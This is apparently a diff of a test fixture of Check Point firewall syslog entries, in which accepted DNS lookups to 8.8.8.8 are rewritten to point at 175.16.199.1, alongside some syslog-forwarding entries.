+<134>1 2020-03-29T16:53:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d26c,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500780"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46461"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:53:01Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d26d,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T16:53:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d274,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500788"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35272"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:53:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d275,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500789"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47617"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:53:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d275,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500789"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44282"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:53:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d274,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500788"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35272"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:53:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d275,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500789"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47617"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:53:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d275,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500789"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44282"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:53:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d276,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T16:53:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d276,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500790"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43245"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:53:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d27e,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500798"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32809"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:53:19Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d27f,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500799"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46818"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:53:19Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d27f,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500799"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43579"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:53:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d280,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500800"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47669"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:53:28Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d288,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500808"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46309"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:53:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d289,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500809"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46114"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:53:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d289,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500809"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34166"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:53:30Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d28a,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500810"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54507"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:53:38Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d292,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500818"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51988"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:53:39Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d293,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500819"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33882"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:53:39Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d293,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500819"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46741"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:53:40Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d294,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500820"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47300"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:53:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d276,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500790"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43245"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:53:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d27e,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500798"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32809"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:53:19Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d27f,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500799"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46818"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:53:19Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d27f,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500799"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43579"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:53:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d280,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500800"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47669"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:53:28Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d288,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500808"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46309"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:53:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d289,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500809"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46114"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:53:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d289,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500809"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34166"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
